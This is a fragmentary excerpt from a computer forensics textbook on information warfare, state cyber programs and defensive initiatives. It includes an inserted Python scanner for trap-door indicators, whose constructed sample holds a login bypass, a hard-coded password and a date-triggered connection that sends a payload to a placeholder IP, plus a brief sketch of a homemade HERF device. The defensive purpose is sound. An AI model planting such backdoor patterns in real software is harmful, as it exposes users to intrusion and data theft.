In Cheng Wang’s case, his computers in Hauppauge, New York, were among
the Falun Gong sites around the world hit by a barrage of hacking attempts and
email “bombs” that coincided with a physical crackdown on the group’s practitioners in China
...
It is often difficult to track down who is to blame, but for networked Americans, who own 60% of the world’s computing capacity, such electronic conflict
should be unsettling
...
A senior CIA official cited a Russian general
who compared the disruptive effects of a cyberattack on transportation or electrical grids to those of a nuclear weapon
...
The Pentagon isn’t sitting still
either
...
...
...
Nearly as worrisome as a cyberattack to experts is electronic espionage
...
One of the worst computer security breaches in U.S. history that spawned an investigation was named Moonlight Maze
...
Successful cyberwar is likely to be like that—no exploding munitions to tell
someone they’re under attack
...
The longer a cyberspy
conceals his or her presence, the longer the intelligence flows
...
During the Kosovo bombing campaign in 1999, the Pentagon set up a high-level information-operations cell
...
By the time Pentagon lawyers approved cyberstrikes against Serbia, events had overtaken the need for them
...
The line between fair-game military sites and civilian infrastructure may not exist
...
If someone tampers with somebody else’s control mechanisms, how assured are those individuals that it would stop right there? The United
States, more dependent on computer networks than anyone, might lose the most in
legitimizing cyberwar
...
Among the sites hacked in the Caucasus Web war was one belonging to the Washington, D.C.–based Armenian National Institute, which studies the 1915–1918 Turkish genocide of Armenians
...
armeniangenocide
...
One Austin, Texas–based corporation already has its own rules
...
The company will not license the technology to nine countries and three U.S. government agencies because of the potential for privacy abuse [3]
...
In 1998, a company tried to buy rights to
the technology
...
WHAT INDUSTRY GROUPS HAVE DONE TO
PREPARE FOR INFORMATION WARFARE
On December 18, 2000, the National Security Council held the first meeting of the recently formed Cyberincident Steering Group, aimed at fostering cooperation between
private industry and government to secure systems from domestic and international
cyberattack
...
Among topics discussed were the creation of a rapid response
system and communications between industry and government
...
...
...
According to the report, foes of a militarily dominant United States,
rather than challenging it head-on, would seek to target an Achilles’ heel in cyberspace or threaten the use of the deadliest chemical, nuclear, or biological weapons
(see sidebar, “Doomsday Software”)
...
With their identity hidden behind a web of front companies and
subcontractors, Aum engineers sold as many as 200 systems ranging from databases
for clients to an Internet messaging service
...
In the mid-1990s, sect members burglarized and stole secrets from Japan’s top defense contractor and its top semiconductor maker—part of an extraordinary campaign to develop biological agents, laser guns, and other high-tech weapons
...
That may
soon change
...
...
Over time, attacks are increasingly likely to be fired off through computer networks rather than conventional arms, as the skill of U.S. adversaries in employing them evolves
...
...
The interagency, FBI-led National Infrastructure Protection Center uses a slide depicting China’s Great Wall in its standard presentation on cyberthreats, along with a quote from Sun Zi, author of a treatise on war in about 350 B.C.
“Subjugating the enemy’s army without fighting is the true pinnacle of excellence,” the FBI’s slide quotes the ancient Chinese strategist as saying
...
Industry Groups Prepare to Fight Cyberattacks
A group of technology heavyweights including Microsoft and Intel has recently unveiled a new resource in their efforts to strengthen cybersecurity
...
Participants in the
undertaking, dubbed Information Technology Information Sharing and Analysis
Center (IT-ISAC), exchange information about their security practices
...
In attendance during the outline of the goals were representatives
from Microsoft, AT&T, Oracle, IBM, Hewlett-Packard, Computer Associates, EDS,
Entrust Technologies, KPMG Consulting, Cisco Systems [4], Nortel Networks, and
other companies
...
Members have created the center in hopes of improving responses to cyberattacks and hacking against
corporate computer networks
...
In such attacks, aimed at organizations large and small, some
hackers may deface a Web site with graffiti or more pointed messages
...
Many companies
have increased security measures to safeguard valuable intellectual property, but a
number of reports indicate that most continue to be vulnerable to such incidents
...
Tech companies reported the majority of those hacking incidents
...
Following a string of attacks on federal systems, President Clinton in 2000
launched a $2 billion plan for combating cyberterrorism that included an educational initiative to recruit and train IT workers
...
With the aftermath of the 9-11 terrorist attacks, the Bush administration expanded this plan 50-fold
...
For most people, it is obvious that the political and economic aspects of the national security policies of the United States are developed by the national political authorities (the president and Congress) and, in dealing with foreign states or groups, executed by the Departments of State, Commerce, Agriculture, and so on
...
Few, however, pay much attention to just how and by whom psychological
forces are to be developed to support national policies
...
This new form of warfare has become known as information warfare (IW)
...
Such a strategy would include
clear doctrine and a policy for how the armed forces will acquire, process, distribute, and project knowledge
...
...
Such an expansion would mirror the evolution of
traditional warfare toward IW
...
As
“first wave” wars were fought for land and “second wave” wars were fought for control over productive capacity, the emerging “third wave” wars will be fought for
control of knowledge
...
Currently, there is neither formal military doctrine nor official definitions of
IW
...
Despite the lack of an authoritative definition, “netwar” and “cyberwar” are emerging as key concepts in discussing IW
...
Netwar is a societal-level ideational conflict waged in part through internetted
modes of communication
...
Netwar is about ideas and epistemology—what is known and
how it is known
...
The target of netwar is the human mind
...
Consider, for example, Radio Free Europe, the Cominform, Agence France Presse, or the U.S. Information Agency
...
The emergence of nongovernmental political actors such as Greenpeace and Amnesty International, as well as survivalist militias and Islamic revivalists, all with easy access to worldwide computer networks for the exchange of information or the coordination of political pressure on a national or global basis, suggests that governments may not be the only parties waging information wars
...
It would be comforting to believe that the tried and true methods (and limitations) of propaganda still worked
...
The war contained many elements of classic propaganda: accusations of bombed baby-milk factories and stolen
baby incubators; inflated rhetoric and inflated stakes of the conflict; the future of the
new world order and “the mother of battles” for the future of Islam; and the classic
us or them polarization in which neutrality or unenthusiastic support was decried
...
While Saddam
Hussein became the new Hitler and President Bush, Sr
...
All of that changed,
however, during the second invasion of Iraq in May of 2003 by George Bush, Jr
...
Indeed, there may have been a spark
of netwar genius in treating the Islamic Iraqi soldiers as “brave men put into an impossible situation by a stupid leader
...
There may have been a glimpse of future netwar: it is rumored that
Baghdad Radio signed on one morning with “The Star-Spangled Banner
...
Contemporary technologies have the potential to customize propaganda
...
Contemporary databases and multiple channels for information transmission have created
the opportunity for custom-tailored netwar attacks
...
A major new factor in IW results directly from the worldwide infosphere of
television and broadcast news
...
This media-created universe is
dubbed fictive rather than “fictional” because although what is shown may be true,
it is not the whole, relevant, or contextual truth, and, of course, the close etymological relationship between fictive and fictional suggests how easy it is to manipulate the message
...
Somalia gets in the news and the United States gets into Somalia despite the reality of
equally disastrous starvation, disorder, and rapine right next door in Sudan
...
The potential for governments, parties in a civil war such as Bosnia, rebels in Chiapas, or even non-state interests to manipulate the multimedia, multisource fictive universe to wage societal-level ideational conflicts should be obvious
...
The niche-manipulation potential available to states or private interests with access to the universe of internetted communications, such as the networks over which business, commercial, and banking information are transmitted, could easily provoke financial chaos
...
Direct satellite broadcast to selected cable systems [5], analogous to central
control of pay-per-view programs, again offers the potential for people in one
province or region of a targeted state to discover that the highest level of their leadership has decided to purge their clansmen from the army
...
Fictive Broadcasts
When the new, but already well-understood, simulation technologies of the tekwar
and MTV generation are added to the arsenal of netwar, a genuinely revolutionary
transformation of propaganda and warfare becomes possible
...
The credibility of the opponent was the target,
and the strategic intention was to separate the government from the people
...
Stored video
images can be recombined endlessly to produce any effect chosen [6]
...
Of course, truth will win out eventually, but by the time the people of the targeted nation discover that the nationwide broadcast of the conversation between
the maximum leader and George W
...
Netwar is beginning to enter the zone of illusion
...
Here’s how it might work: Through hitching a ride on an unsuspecting commercial satellite, a fictive simulation is broadcast
...
These info-niche targets, and the information they receive, are tailored to the strategic diplomacy needs
of the moment: some receive reinforcement for the fictive simulation; others receive the real truth; still others receive slight variations
...
This is not traditional propaganda in which the target is discredited as
a source of reliable information
...
What is being attacked in a strategic level netwar are not only the
emotions, motives, or beliefs of the target population, but the very power of objective reasoning
...
Let us return to the previous scenario to play out its effects
...
George W
...
In a society under assault across its
entire infosphere, it will become increasingly difficult for people to verify internally
the truth or accuracy of anything
...
At the strategic level, the ability to observe is flooded by contradictory information and data; more important, the ability to orient is weakened by the assault
on the possibility of objective reasoning; decisions are made increasingly in response to a fictive or virtual universe and, of course, governmental and military actions become increasingly chaotic, as there is no rational relationship of means to
ends
...
Reality, however, may be far more complex than the infowarriors yet imagine,
and victory not so neat
...
Victory may be too costly, as the cost may be truth itself
...
That is, the question
must be raised whether using the techniques of IW at the strategic level is compatible with American purposes and principles
...
There are good reasons to be skeptical
...
The substantive purpose of
communication is the building or developing of the individual human personality
...
It is the glue that binds a
society together
...
At a more serious level, the debates in American society about prayer
in the public schools illustrate a recognition of the substantive and formative nature
of communication in society
...
Finally, any real-world society rests on substantive communication and understanding among its members
...
The efforts of several nations such as China, Iran, and Saudi Arabia to insulate their societies from the effects of the global communications network illustrate their awareness that their cultures and societies may depend on a distinctive shared, substantive universe of discourse
...
That France seeks to limit the percentage of foreign broadcast material and
American films in Europe illustrates the seriousness with which they consider the
substantive nature of communication
...
Pragmatic communication is defined by its goal and consists of the
universe of techniques designed to influence other persons to behave in ways the
communicator wishes
...
Most political and commercial communication is merely pragmatic
...
This pragmatic use of communication as an attempt at perception manipulation is, of course, the central essence of
IW
...
Finally, the intoxicant function of communication in American society is
equally straightforward
...
Civil communication, or public discourse, in contemporary American society
is dominated almost entirely by the intoxicant and pragmatic modes
...
Pluralistic America is supposed to be a society in which the formation of character and opinion is left, through the use of various means of communication, to
private initiative
...
The official military view of diplomatic strategy is the art and science of developing and using political, economic, psychological, and military force as necessary
during peace and war to afford the maximum support to policies, to increase the
probabilities and favorable consequences of victory, and to lessen the chances of defeat
...
A slightly different view of strategy, however,
may highlight a problem of IW
...
Sound military strategy requires influencing the adversary decision maker in
some way that is not only advantageous but also reasonably predictable
...
A national security strategy of IW or netwar at the strategic level (that is, societal-level ideational conflict waged in part through internetted modes of communication) and an operational-level cyberwar or command-and-control warfare campaign to decapitate the enemy’s command structure from its body of troops may or may not be advantageous but, more important, is unlikely to produce effects that are reasonably predictable
...
If the
goal is influencing the adversary’s ability to observe by flooding them with corrupted
or contradictory information and data, disrupting their ability to orient by eliminating the possibility of objective reasoning, and forcing their decisions to respond to a
fictive or virtual universe, actions will, of course, be produced
...
The military operational-level of cyberwar or command-and-control warfare
appeals to the infowarrior as an attractive military strategy
...
A successful diplomatic cyberstrategy depends on the ability of the local military
commander to deploy his or her power assets, especially combat forces, not merely
to dominate the enemy’s decision cycle (which, after all, has just been rendered
chaotic), but to exploit opportunities as they evolve unpredictably from the disoriented, decapitated, or irrational enemy actions
...
Diplomatic cyberstrategy is the control of the evolution of the battlefield or theater power distribution to impose the allied commander’s order on the enemy’s
chaos
...
Merely
defeating hostile military forces may be insufficient
...
Operational-level cyberwar may,
then, be that very acme of skill that reduces the enemy will without killing
...
Strategic Diplomatic Implications
The tools, techniques, and strategy of cyberwar will be developed and, during
wartime, should be employed
...
Such a development would certainly be prudent
...
This application may not be prudent, however, as there are serious reasons to doubt the ability of the United States to
prosecute an information war successfully
...
Our communications infrastructure, the information highway, is wide open
...
Also, one may find physical control and security to be impossible
...
In the future, these may not
be amateurs, but well-paid “network ninjas” inserting the latest French, Iranian, or
Chinese virus into AOL or other parts of the Internet
...
Currently, for example, over 101,000 Internet databases are being
used by over 543 million people in over 163 nations
...
The spy flap between France and the United States over alleged U.S. attempts to gather data on French Telecom may be indicative of the future
...
It will certainly be expensive: the U.S. business community and the U.S. armed forces are required to devote ever more resources and attention to computer, communications, and database security
...
The second reason to doubt U.S. ability to prosecute an information war is that the political and legal issues surrounding IW are murky
...
Which committees of
the House or Senate would have control and oversight of policies attendant to IW?
Which would have the power to inquire into the judgment of a local ambassador or
military commander who wished to use the tools of cyberwar for a perception manipulation in peacetime that would shape the potential wartime environment?
The U.S. armed forces only execute the national military strategy—they do not control it
...
They
are simultaneously, albeit unintentionally, developing the tools and capabilities
to execute a national strategic IW strategy
...
Congressional oversight of the development of a national strategic-level information war capability is even more essential than oversight of the intelligence community
...
Pluralism is a great strength of American society but perhaps a drawback in waging information war
...
Because there is no single view of what is morally acceptable, but simply a host of contending views, a national security strategy of IW could be developed by the national security decision makers who lacked a moral consensus
...
Unless the goal of an information war is merely to unhinge people from their ability to reason objectively, and thereby create an interesting problem for post-conflict reconstruction, any strategic-level netwar or information war would require the ability to communicate a replacement for the discredited content of the target society
...
Put in terms of such a concrete policy goal, the philosophically problematic nature of information war becomes outrageously obvious
...
Indeed, the United States might be able to loose anarchy in a society, but that is not usually the political goal of war
...
Fighting Against Macro Threats
353
Translated to the strategic level, however, netwar or information war is not a prudent national security or military strategy for the simple reason that neither the armed forces nor any other instruments of national power have the ability to exploit an adversary’s society in a way that promises either advantageous or predictable results
...
Conflict resolution, including ending wars this side of blasting people into unconditional surrender, assumes and requires some rationality—even if that rationality is the mere coordination of ends with means
...
However, a successful all-out strategic-level information war may have destroyed the enemy’s ability to know anything with certainty and, thereby, their capacity for minimal reasoning or pragmatic communication
...
Precisely how war termination would have been accomplished without an effective leadership will remain, we can hope, one of the great mysteries
...
That is, the credibility and legitimacy (even the physical ability to communicate) of the decision makers will be compromised or destroyed relative to their own population and in terms of their own worldview
...
How does the United States accomplish conflict resolution, war termination, or post-conflict reconstruction with a population or leadership whose objective reasoning has been compromised?
Just as the mutually destructive effects of nuclear war were disproportionate to the goals of almost any imaginable conflict, so may be the mutually destructive effects of a total information war exchange on the publics exposed and subsequent rational communication between the sides
...
Information war, then, may be the central national security issue of the 21st century
...
To facilitate this objective, the U.S. armed forces are developing, under the rubric of command-and-control warfare, the technologies and systems that will provide the capability for cyberwar
...
Many of the same technologies and systems can be used to develop a national-level capability for strategic netwar
...
It may not be possible to control and exploit information and information technologies to impose a form on the remnants of societies no longer capable of self-organization because their substantive universe of meaning has been destroyed or corrupted
...
Perhaps strategic-level information war is, indeed, like nuclear war: the capability is required for deterrence—its employment, the folly of mutually assured destruction
...
It is useless to pretend that the proliferation of these technologies will not provide capabilities that can do serious harm
...
It is almost universally agreed that these capabilities are essential on the contemporary battlefield
...
THE ROLE OF INTERNATIONAL ORGANIZATIONS
Information on countries with offensive IW initiatives is less authoritatively documented, but studies and foreign press reporting help point to international organizations that probably have such an initiative under way
...
At the low end, in June 1998, the director of central intelligence stated that several countries are sponsoring IW programs and that nations developing these programs recognize the value of attacking a country’s computer systems—both on the battlefield and in the civilian arena
...
The June 2002 National Communications System (NCS) report on the threat to U.S. telecommunications states that the National Intelligence Council reports that, among these, Russia, China, and France have acknowledged their IW programs
...
1)
...
1 Publicly Identified Foreign Countries Involved in Economic Espionage, and Information Warfare: Initiatives and U.S. Remediation

Country        Economic Espionage   Information Warfare Initiative   Major Remediation Provider
Belarus        Yes                  —                                —
Bulgaria       Yes*                 Yes                              —
Canada         Yes*                 Yes                              Yes
China          Yes*                 —                                —
Cuba           Yes*                 Yes                              Yes
France         Yes*                 Yes                              Yes
Germany        Yes*                 Yes                              Yes
Hungary        Yes                  —                                —
India          Yes*                 Yes                              Yes
Iran           Yes*                 Yes                              Yes
Ireland        —                    —                                Yes
Israel         Yes*                 Yes                              Yes
Japan          Yes*                 —                                —
Moldavia       Yes                  —                                —
Pakistan       Yes                  —                                Yes
Philippines    Yes                  —                                Yes
Poland         Yes                  —                                —
Romania        Yes                  —                                —
Russia         Yes*                 Yes                              —
North Korea    Yes*                 —                                —
South Korea    Yes*                 —                                —
Taiwan         Yes*                 —                                —

*Countries identified by NCS as using electronic intrusions usually for economic espionage purposes
...
All of these countries publicly acknowledge pursuing defensive IW initiatives to protect their military information capabilities or national information infrastructure:
India established a National Information Infrastructure-Defensive group several years ago, apparently in response to China’s growing interest in IW
...
Taiwan also recently announced the creation of a task force to study ways to protect their information infrastructure from the growing IW threat from China
...
Defensive measures (deterrence, protection, and restoration) are difficult to implement without also developing an understanding of potential adversaries, investing in computer and software development, and creating a major operational capability—all steps directly applicable to creating an offensive IW capability
...
The presence of a defensive IW initiative, however, is inadequate alone to assess that a foreign country is also developing its offensive counterpart
...
For instance, Israel was involved in the 1991 penetration of U.S. defense computers and copying of the Patriot missile defense system, according to the NCS report
...
Ranking the Risks
The results of this analysis point to a tiered set of foreign national risks to U.S. computing and network systems remediation involving the insertion of malicious code
...
On the other hand, France, Germany, Russia, and Taiwan comprise a second tier of countries that have been identified as participants in economic espionage against the United States and that have developed initiatives but are not believed to be major foreign sources of U.S. remediation services
...
Also, the governments and companies in countries that have engaged in economic espionage against the United States may use the same remediation access to pursue those espionage objectives
...
Analysis of the software and testing for trap doors and other accesses are key elements in this risk reduction
...
Evaluators should ensure that all the program code has a legitimate business purpose; any user code should be extracted
...
Customers may want the source code to be shared with the evaluator so its integrity can be examined
...
358
Computer Forensics, Second Edition
Preventing unauthorized access in the future is a second essential step in ensuring the integrity of the system or network
...
At a second level, a red team approach (actually trying the software) can be taken to explore more deeply whether trap doors exist
...
These software accesses should be protected and be able to identify and halt delivery of malicious code
...
They can also use such evidence to compare similar events and facilitate the restoration of protected service to the system
...
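The trap-door review the preceding paragraphs describe, as an added example that is not the book's code: a first-pass static scan over delivered source for constructs an evaluator should demand a business justification for (credentials compared against string literals, a user name that short-circuits authentication, connections to literal IP addresses, long encoded blobs, and branches that arm themselves on a calendar date). The sample "remediated" module, its addresses and its strings are constructed for the example; the rule set is a heuristic starting point for the human review and the red-team testing the text calls for, not a complete backdoor detector.

```python
"""Heuristic source review for trap-door indicators (added example, not the
book's code).  Flags constructs an evaluator should require a business
justification for; the sample program below is constructed for the example."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    text: str


# Each rule is (name, pattern).  Patterns are deliberately broad: the regex
# surfaces candidates, the evaluator decides whether each one is legitimate.
RULES = [
    # credential compared against a string literal in the code itself
    ("hardcoded-credential",
     re.compile(r"""(?i)\b(password|passwd|pwd|secret|token)\b\s*==\s*["'][^"']+["']""")),
    # a particular user name short-circuits authentication on the same line
    ("magic-bypass",
     re.compile(r"""(?i)\b(user(name)?|login|account)\b\s*==\s*["'][^"']+["'].*\breturn\s+True\b""")),
    # outbound connection to a literal IP address rather than a configured host
    ("literal-ip-connect",
     re.compile(r"""connect\(\s*\(?\s*["'](\d{1,3}\.){3}\d{1,3}["']""")),
    # long base64-looking literal: encoded payload, key or second-stage code
    ("encoded-blob",
     re.compile(r"""["'][A-Za-z0-9+/]{40,}={0,2}["']""")),
    # branch that arms itself on a calendar date (logic-bomb / time-trigger shape)
    ("date-trigger",
     re.compile(r"""(?i)\b(date|datetime|time)\b.*(>=|>|==).*?\(\s*\d{4}\s*,\s*\d{1,2}""")),
]


def scan_source(source: str) -> list[Finding]:
    """Run every rule over every line; one finding per (rule, line) hit."""
    findings: list[Finding] = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(name, line_no, line.strip()))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count of hits per rule, for the evaluator's report."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample of a "remediated" module as delivered by a vendor.
SAMPLE_SOURCE = '''import socket, datetime, hashlib

def check_login(user, password):
    if user == "fieldsvc": return True                # undocumented maintenance login
    if password == "svc-override-2000": return True   # hard-coded override
    return hashlib.sha256(password.encode()).hexdigest() == STORED_HASH

def nightly_sync(records):
    if datetime.date.today() >= datetime.date(2000, 1, 1):
        s = socket.socket()
        s.connect(("203.0.113.7", 8443))              # not in the design document
        s.sendall(PAYLOAD)

PAYLOAD = b"aGVsbG8gd29ybGQgdGhpcyBpcyBhIGxvbmcgYmFzZTY0IGJsb2IgZm9yIHRoZSBkZW1vCg=="
'''


def scan_sample() -> list[Finding]:
    return scan_source(SAMPLE_SOURCE)


if __name__ == "__main__":
    for f in scan_sample():
        print(f"line {f.line_no:>3}  {f.rule:<22} {f.text}")
    print(summarize(scan_sample()))
```

Every hit in the sample is something the vendor should be able to point to in the design document; the ones it cannot explain are exactly the accesses the red team then exercises. A scan like this is cheap enough to run on every delivery, and its false positives are the price of not depending on the vendor's own description of what the code does.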
Proposed Cyber Crime Laws Stir Debate Within International Organizations
Lots of countries still haven’t updated their laws to cover Internet-based crimes, leaving companies in many parts of the world without legal protections from malicious hackers and other attackers who are looking to steal their data
...
Of special concern is a proposed cyber crime treaty being developed by the 41-nation Council of Europe, which some business groups fear could affect corporate data-retention policies
...
Those concerns were echoed by attendees at a forum on international cyberlaw sponsored by McConnell International LLC, the consulting firm that issued the new report on cyber crime laws
...
They fear that they are moving toward not too little law but too much law
...
There is competition among countries for leadership and excellence in the digital economy
...
The European Cyber Crime Treaty was approved in 2002 and was recently adopted by the United States and other countries outside of Europe
...
The treaty also seeks to prevent data havens—areas in which laws governing cyber crimes are weak
...
There is so much gray area
...
Internet service providers are worried that they may face new obligations to hold onto data in response to requests from law enforcers
...
Clarification on the data-retention issue is going to be needed
...
to prevent French citizens from trafficking in Nazi paraphernalia
...
THE ROLE OF GLOBAL MILITARY ALLIANCES
The following discussion highlights what actually constitutes global military alliances with regard to information operations
...
Military
A look into the future of IW indicates an increasing role for information operations and the emergence of IW as a new paradigm of warfare
...
These global planners must also remember that IW is emerging as a paradigm of warfare, not a paradigm of information
...
Although there may be less bloodshed in an information war, human suffering will, in all likelihood, result
...
Information technology does not make war any more acceptable to a civilized society
...
Global Information
Although seemingly self-explanatory, understanding the nature of global information alliances is important
...
The processing of data into information involves placing the data into some context
...
The result is information, and this is created and manipulated to enable decisions to be made
...
Information, or any developed form of the information, is only one part of an information technology system
...
Any one of the individual elements of the information technology system, as well as the information technology system processes that convert the raw data into various forms of information, may provide a suitable target on which influence may be exerted
...
Global Operations
Global information operations seek to influence the decision-making process
...
They are activities directly focused on warfare and include offensive and defensive activities aimed at all levels of the decision-making process
...
When correctly applied, offensive global information operations alliances can be just as lethal as the employment of conventional weapons
...
The resultant crash will destroy the aircraft, and generally kill the pilot and crew, just as effectively as the best air-to-air missile
...
MARTIAL LAW AND CYBERSPACE
Realistically, there are a number of scenarios, each of varying degree, in which IW might be utilized in the future in cyberspace and thus bring about martial law
...
Many scholars have put forth arguments concerning the formation and survivability of hegemonic powers
...
Under this scenario, realist concerns run rampant, as the United States has a vested interest in becoming the hegemon for the next power cycle
...
A scenario where stability and consistency for information technologies are derived from cooperative international endeavors to promote and facilitate global prosperity is more likely
...
Information technology is cooperative by nature and tremendous benefits can be derived from greater interconnectivity
...
Once that integration takes place, each connected nation will have an interest in maintaining the stability and survivability of the overall network
...
Despite collective interests, information terrorism will continue to be a viable national security concern for all third wave nations
...
By increasing security and gathering intelligence regarding any plans that might be in consideration, the United States can ensure that the threat of terrorism is contained to isolated incidents from which this country can recover
...
Other likely scenarios include the use of IW for blackmail or for limited short-term gains
...
Will nations allow IW threats to be used as blackmail? Will the United States allow limited IW in order to pursue strategic or comparative political and economic gains or is the fear of escalation an adequate deterrent to such ambitions? These questions must also be addressed
...
Life in cyberspace is more egalitarian than elitist and more decentralized than hierarchical
...
One might think of cyberspace as shaping up exactly like Thomas Jefferson would have wanted: founded on the primacy of individual liberty and commitment to pluralism, diversity, and community
...
As a nation, the United States must make sure that the structure it is building has a strong foundation and that weaknesses in that structure are not used to destroy it
...
However, it is a task the United States must undertake
...
If the United States does not address these issues now, the future of our country will be jeopardized
...
Some of these issues concern national security; others concern individual privacy
...
Fundamental issues arise from hacker explorations
...
Recent efforts in cloning produced a human fetus
...
They argued that before experimentation in cloning continued, the United States must decide as a society which direction that the new technology will go, what ends it hopes to achieve, and what the limits on the use of this new technology should be
...
There is no need to stop the technology, but the United States must decide what direction it wants the technology to take and what rules will govern the use of this technology
...
The United States certainly is, as former Vice President Al Gore noted, in the midst of an Information Revolution
...
Conceptions of national security will have to evolve as well
...
Isaac Asimov (noted science fiction author) notes that waiting for a crisis to force the United States to act globally runs the risk of making them wait too long
...
Similarly, philosophy comes bundled with every new technology; when one is embraced, the other is there as well
...
The United States must be prepared to deal with a philosophy that changes the distribution of power, changes political relationships, and challenges the essence of nation states
...
THE SUPER CYBER PROTECTION AGENCIES
Some might call it paranoia, but the U.S. government is growing increasingly worried that foreign infiltrators are building secret trapdoors into government and corporate networks with the help of foreign-born programmers doing corporate work—their regular jobs
...
According to the CIA, these two countries each have plans to conduct information warfare, and planting trapdoors wherever they can would be a part of that
...
HERF Guns Work
Though still secretive about the practice, nations are also building futuristic radio-pulse devices (popularly called high-energy-radio-frequency [HERF] guns) that can disrupt or destroy electronics in networks, cars, airplanes, and other equipment by sending an energy beam at them
...
This conference typically draws a large crowd of government spooks and high-tech strategists from around the world
...
Russia is also viewed as a threat because it has defensive and offensive IW programs under way
...
Israel has already hacked its way into U.S. computer systems to steal information about the Patriot missile
...
The United States can’t allow the emergence of another area of confrontation
...
The first step in the cyberdisarmament process is to get the nations of the world to discuss the issue openly
...
The U.S. Department of Defense has complained in meetings with congressional subcommittees that it has seen severe network-based attacks coming from Russia
...
IW is now viewed by the CIA as a bigger threat than biological or nuclear weapons
...
HERFs Are Easy to Make
More than traditional hacker techniques comprise infowar
...
People are spending a lot of money on cyberweapons
...
A former engineer at the Naval Air Warfare Center hooked up a 4-foot parabolic antenna powered by ignition coils and parts from a cattle stun gun during one Infowar session
...
With not much more than $900 in parts, he directed a 300-MHz pulse at a computer running a program
...
It’s high school science, basically
...
The computer industry is going to have to sit up and take note
...
Corporate Cyber Crime Program
Recently, the FBI (the other Super Cyber Protection Agency) officially announced the formation of its InfraGard program, a cyber crime security initiative designed to improve cooperation between federal law enforcement officials and the private sector (after completing the process of setting up InfraGard chapters at its 59 field offices)
...
The final local chapter, composed of information security experts from companies and academic institutions, was put in place in December 2000 in New York
...
The program allows law enforcement and industry to work together and share information regularly, including information that could prevent potential intrusions into the U.S. national infrastructure
...
The problem, according to sources, has been that the FBI treats all potential cyber crimes as law enforcement investigations first and foremost—a stance that effectively bars access to information by other government security agencies
...
The InfraGard announcement was one of several rather belated efforts by the outgoing Clinton administration in 2000 to create new security structures
...
These new programs will have a better chance of survival if they can demonstrate that they’re already accomplishing useful objectives
...
Even though the InfraGard program hasn’t had much of an effect on corporate users thus far, more than 900 businesses have already signed up to participate in the program; and, the FBI is still getting applications daily from companies who want to go through the motions of being part of a chapter
...
The program has had a beneficial impact because it lets companies share information on security vulnerabilities without creating the levels of hysteria that usually accompany highly publicized reports of hacking attacks and other cyber crimes
...
U.S. allies and potential coalition partners are similarly increasingly dependent on various information infrastructures
...
There is no front line
...
), control, communications, and intelligence targets
...
The post–Cold War “over there” focus of the regional component of U.S. national military strategy is, therefore, inadequate for this kind of scenario and is of declining relevance to the likely future international strategic environment
...
An in-depth examination of the implications of IW for the United States and allied infrastructures that depend on the unimpeded management of information is also required in the fight against macro threats—defensive strategies for governments and industry groups, as follows
...
Information systems expertise and access to important networks may be the only prerequisites
...
Expanded role for perception management: New information-based techniques may substantially increase the power of deception and of image-manipulation activities, dramatically complicating government efforts to build political support for security-related initiatives
...
A new field of analysis focused on strategic IW may have to be developed
...
Difficulty building and sustaining coalitions: Reliance on coalitions is likely to increase the vulnerabilities of the security postures of all the partners to strategic IW attacks, giving opponents a disproportionate strategic advantage
...
Given the increased reliance of the U.S. economy and society on a high-performance networked information infrastructure, a new set of lucrative strategic targets presents itself to potential IW-armed opponents
...
Major recommendations have emerged that address this shortcoming
...
With the preceding in mind, when completing the Defensive Strategies for Governments and Industry Groups Checklist (Table F13
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
This new form of warfare has become known as information warfare (IW)
...
True or False? Any discussion of information warfare, netwar, cyberwar, or even perception manipulation as a component of command and control warfare by the armed forces of the United States at the strategic level must occur in the context of the moral nature of communication in a pluralistic, secular, and democratic society
...
The following countries publicly acknowledge pursuing the defensive IW initiatives goal of protecting their military information capabilities or national information infrastructure, except for one:
A
...
B
...
C
...
D
...
2
...
Have the major foreign providers of software remediation services to Israel and, to a lesser extent, India, acknowledged a defensive IW or national information infrastructure protection program, and have they also met at least one of the supplemental criteria?
B
...
Have authoritative, but unofficial, host country sources suggested that a country has an offensive IW program?
D
...
At the strategic level, the ability to observe is flooded by:
A
...
The decisions that respond increasingly to a fictive or virtual universe
C
...
The notion that there is no rational relationship of means to ends
E
...
The following are conclusions drawn from fighting against macro threats,
except:
A
...
Blurred traditional boundaries
C
...
High entry cost
E
...
Action steps in preparing for defensive strategies for governments and industry groups include the following, except:
A
...
Risk assessment
C
...
Government role
E
...
The irregularities were serious enough to potentially necessitate a re-stating of earnings
...
They retained a computer forensics specialist (CFS) to conduct large-scale data mining to get to the bottom of the irregularities
...
The bank sent the computer to a CFS team (CFST) for a forensic examination
...
How did the CFS go about conducting the investigation?
Optional Team Case Project
A woman employed by a large defense contractor accused her supervisor of sexually harassing her
...
How did the CFS go about conducting the investigation?
REFERENCES
[1] Vacca, John R., ...
[2] Vacca, John R., ..., Charles River Media, Hingham, MA, 2001.
[3] Vacca, John R., Net Privacy: A Guide to Developing and Implementing an Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001.
[4] Vacca, John R., High-Speed Cisco Networks: Planning, Design, and Implementation, CRC Press, Boca Raton, FL, 2002.
[5] Vacca, John R., The Cabling Handbook, 2nd ed., ...
[6] Vacca, John R., ...
14
The Information Warfare Arsenal and Tactics of the Military
The growing reliance on computer networks makes the networks themselves likely sites for attack
...
Current efforts include software agent–based systems (for real-time detection and recovery from a cyberattack) and network-level early-warning systems (for monitoring suspicious online activity)
...
With all the fervor of their comrades in arms, computer-savvy patriots on both sides have managed to infiltrate and disable enemy Web servers
...
The electron is the ultimate precision-guided weapon
...
In the very worst case (what some have termed an electronic Pearl Harbor) a sudden, all-out network assault would knock out communications as well as financial, power, transportation, military, and other critical infrastructures, resulting in total societal collapse
...
The advent of the Internet means there really isn’t an outside anymore
...
Another concern is that the military’s push toward commercial off-the-shelf technology is exposing vital networks to attack
...
), not in Washington, D.C.
...
Military networks tend to be favored targets for hackers
...
Annoying and costly as that may be, it’s not the chief worry
...
The Pentagon’s primary concern is the government that’s prepared to invest heavily in coordinated strategic attacks on U.S. military and civilian networks
...
